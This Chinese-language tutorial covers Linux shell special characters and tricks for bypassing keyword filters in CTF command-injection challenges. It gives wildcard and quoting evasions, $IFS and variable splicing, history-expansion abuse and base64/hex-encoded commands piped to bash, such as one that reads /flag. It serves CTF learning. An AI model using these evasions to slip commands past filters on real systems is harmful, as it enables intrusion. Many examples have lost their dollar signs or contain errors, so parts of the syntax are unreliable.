LinuxBypass技巧：利用特殊字符执行命令

本文将详解Linux系统中利用特殊字符进行命令执行和绕过技巧，帮助用户更有效地操作Linux系统，并应对安全限制。文章涵盖了Linux命令行中特殊字符（如$、!、;、|、&、&&等）的用法，以及命令历史调用、参数操作、逻辑运算符、后台进程设置等技巧。此外，还深入探讨了通配符、括号、重定向、变量拼接、编码绕过等高级技巧，并结合实际案例（如CTF比赛场景）分析特殊字符在命令执行绕过中的应用，例如利用`!!`执行上一条命令，`!$`获取上一条命令的最后一个参数，以及`|`进行命令管道操作等，最终提升读者在Linux系统下的命令执行能力和安全意识。

在Linux系统中，命令执行和绕过技术涉及许多特殊字符和技巧。这些字符和技巧可以帮助用户更有效地操作系统，同时在某些情况下绕过安全限制。本文将详细介绍这些特殊字符及其用法。

特殊字符在Linux命令行中的作用如下：

• $：表示输入的第n个参数。例如，$1表示第一个参数，$2表示第二个参数。对于10及以上的参数，需要使用${10}的形式。
• cd 0 ~9：表示切换到当前用户的根目录。
• $：也表示全局变量。
• !：可以单独成一个文件夹，也可以作为文件夹的末位字符，但不能在叹号后面加东西。叹号加字符代表特殊含义。

在命令执行中，以下是常用的特殊字符和技巧：

!! --> 执行上一条命令
!$ --> 上一个命令的最后一个参数
!^ --> 上一个命令的第一个参数
!:- --> 去掉最后一个参数执行上一个命令
!* --> 使用上条命令的所有参数
命令 !上一条命令:参数所在位置 --> 使用上一条参数的指定参数加入到现在这条命令中
!历史命令数值 --> 执行 history 中指定对应条数的命令
!-2 --> 执行 history 中倒数第二条命令
!关键字 --> 执行上一条包含命令关键字的命令
!!:gs/old/new --> 将上条命令中的 old 替换为 new
逻辑非 ls !(*.cfg)

例如，如果前面执行过cat /flag，那么执行!cat将会执行匹配到的cat /flag命令。然而，如果先执行cat /flag再执行cat /etc/passwd，那么执行!cat只会输出passwd的内容，而不会输出/flag。

在比赛中，如果无法绕过flag关键字的过滤，但在同一环境下，可以通过不断执行!cat来查看其他队伍的cat命令内容。如果有其他人通过cat输出flag，我们也可以得到flag。

.表示当前的shell，例如/bash/shell。

• ;：用分号隔开每个命令，按从左到右的顺序执行，彼此之间不关心是否失败，所有命令都会执行。

用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行， 彼此之间不关心是否失败， 所有命令都会执行。

• |：管道符，表示上一条命令的输出作为下一条命令的参数。

| 表示管道，上一条命令的输出，作为下一条命令的参数

• ||：逻辑或（短路或），左边为真时，右边不执行；左边为假时，才会继续执行右边。

即逻辑或（短路或）||左边为真时，则右边不执行||左边为假时，才会继续执行右边[root@VM-16-13-centos ~]# echo 1 || echo 21

• &：放在启动参数后面表示设置此进程为后台进程。在CTF中，它表示先执行右边再执行左边。

& 放在启动参数后面表示设置此进程为后台进程语法：command1 &此外在CTF中，它又表示先执行右边再执行左边语法：command1 & command2 ping 127.0.0.1 & ls(先执行ls后执行ping)

• &&：逻辑与，先执行左边，只有左边为真，才会执行右边。

逻辑与，和||恰恰相反。先执行左边，只有左边为真，才会执行右边语法：command1 && command2 [&& command3 ...]

• {}与()：用于将一串命令放在括号内，命令之间用分号隔开。

1、(command1;command2;command3....)
2、{ command1;command2;command3…} #第一条命令必须与左边的括号有一个空格，最后一条命令一定要有分号
3、{command,argument}
相同点：
()和{}都是把一串的命令放在括号里面,并且命令之间用;号隔开
不同点
()只是对一串命令重新开一个子shell进行执行,{}对一串命令在当前shell执行
()最后一个命令可以不用分号,{}最后一个命令要用分号
()里的第一个命令和左边括号不必有空格,{}的第一个命令和左括号之间必须要有一个空格
()和{}中括号里面的某个命令的重定向只影响该命令,但括号外的重定向则影响到括号里的所有命令

root@A1u[14:42:02]:~pwd;cat /flag/rootflag{th1s_1s_fl0g}root@A1u[14:45:18]:~ cat /flag;pwdflag{th1s_1s_fl0g}/rootroot@A1u[14:45:23]:~{cat,/flag}flag{th1s_1s_fl0g}root@A1u[14:45:28]:~ { cat /flag;pwd;}flag{th1s_1s_fl0g}/rootroot@A1u[14:45:33]:~{cat /flag;pwd;}-bash: syntax error near unexpected token `}'root@A1u[14:45:38]:~ { cat /flag;pwd}> ^Croot@A1u[14:45:48]:~{ cat /flag,pwd;}cat: /flag,pwd: No such file or directoryroot@A1u[14:47:23]:~ { pwd,cat /flag;}-bash: pwd,cat: command not found

输入/输出的重定向：

command > file   将输出重定向到 file
command > file   将输出以追加的方式重定向到 file
n > file 将文件描述符为 n 的文件重定向到 file。
n >> file 将文件描述符为 n 的文件以追加的方式重定向到 file。
n >& m   将输出文件 m 和 n 合并。
n 

一些特殊的Trick（绕过命令字符的检测）：

• 通配符*与?：

cat /f*          输出所有f开头的文件
cat /f???        输出所有f开头且文件名为四个字符的文件

• []与的绕过：

cat /f[a-z]ag       输出/flag /flbg ... /flzg
cat /f{l,a,b}ag     输出/flag /faag /fbag

关键字绕过：

• 命令提示符：使用*、@、x（x代表1-9，0表示Shell本身的文件名故不可用）、{x}（x>=10）。在没有传参的情况下，这些值都是空。但如果执行cd 0 … cd 9就是转到~目录。

ca*t 1.txt     //* 是传给脚本的所有参数的列表

ca@t 1.txt //@ 是传给脚本的所有参数的列表
ca9t 1.txt //9 是传递给该shell脚本的第九个参数
ca{11}t 1.txt //{x} 两位数以上用${}括起来

反斜杠：

ca\t /flag        cat /flag    
ca\t /f\lag       cat /flag

连接符——单引号||双引号：

双引号:""t /flag
cat "/fl""ag"
ca""t "/fl""ag"
单引号:
ca''t /flag
cat '/fl''ag'
ca''t '/fl''ag'

变量拼接：

1. a=ca;b=t;ab 1.txt
2. a=/flag&& cat a
3. a='/flag' && cat a
4. a=g;cat /fla
3. a="lxs/";b={a:0:1}{a:2:1}{IFS}{a:3:1};$b       利用截取凑成: ls /

编码绕过：

• base64编码绕过：echo 'Y2F0Cg==' | base64 -d 1.txt
• base64编码绕过：echo 'Y2F0IDEudHh0' | base64 -d |bash(或sh)
• base64+sh、bash执行：echo '636174202f666c6167'|xxd -r -p|bash

其中：xxd -r -p 将某种列格式的纯十六进制转储读入，也可以加上 0x 的前缀。

特殊的字符替代方式：

echo {PS2} 对应字符 >
echo{PS4} 对应字符 +
echo {IFS} 对应 内部字段分隔符
echo{9} 对应 空字符串

此外还有8进制 + {}写shell，8进制 + ()执行，16进制 + {}写shell等方法。

以上就是《LinuxBypass技巧：利用特殊字符执行命令》的详细内容，更多关于Linux,特殊字符,命令执行,绕过技巧,CTF的资料请关注golang学习网公众号！